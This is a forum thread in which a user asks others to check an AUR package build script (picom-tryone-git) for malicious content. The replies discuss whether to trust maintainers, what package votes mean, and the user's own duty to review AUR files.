You are not logged in.
- Topics: Active | Unanswered
#1 2020-05-27 13:36:52
- micchan_hanako
- Member
- Registered: 2020-04-16
- Posts: 4
Could someone verify the pkgbuild for picom-tryone-git?
I'm using the picom-tryone fork of picom since it's the only one that fixes tearing on my machine. Could someone look over the pkgbuild to verify that it doesn't do anything malicious? I looked over it myself and didn't spot anything but I want to be sure that it doesn't do anything that it shouldn't. Better safe than sorry : )
Thanks in advance
Offline
#2 2020-05-27 14:13:29
- Trilby
- Inspector Parrot
- Registered: 2011-11-29
- Posts: 29,532
- Website
Re: Could someone verify the pkgbuild for picom-tryone-git?
I'm pretty sure frebib already looked it over. Do you have any reason to trust a random reply to a forum thread than you would to trust the maintainer?
It also have 5 votes, so at very least 5 other people have already looked it over.
"UNIX is simple and coherent..." - Dennis Ritchie, "GNU's Not UNIX" - Richard Stallman
Online
#3 2020-05-27 16:18:48
- micchan_hanako
- Member
- Registered: 2020-04-16
- Posts: 4
Re: Could someone verify the pkgbuild for picom-tryone-git?
Forgive me for being a bit daft here, but how would I go about checking if an AUR package has already been reviewed for security issues? You mentioned 5 votes, where did you come across that?
EDIT: nevermind, it was literally written on its AUR page, my bad
Last edited by micchan_hanako (2020-05-27 16:23:23)
Offline
#4 2020-05-27 17:38:19
- 2ManyDogs
- Forum Fellow
- Registered: 2012-01-15
- Posts: 4,645
Re: Could someone verify the pkgbuild for picom-tryone-git?
No matter how many votes an AUR package has, remember:
DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.
Just because a package has five votes, this does not mean that five people have checked the PKGBUILD for security issues. Many people use the AUR without checking anything, especially if they use an AUR helper.
Also, as Trilby says, anyone on the forum could tell you that the PKGBUILD is fine, but why should you believe them? And if you have issues, why should they care?
The bottom line is that you are responsible for checking yourself.
Offline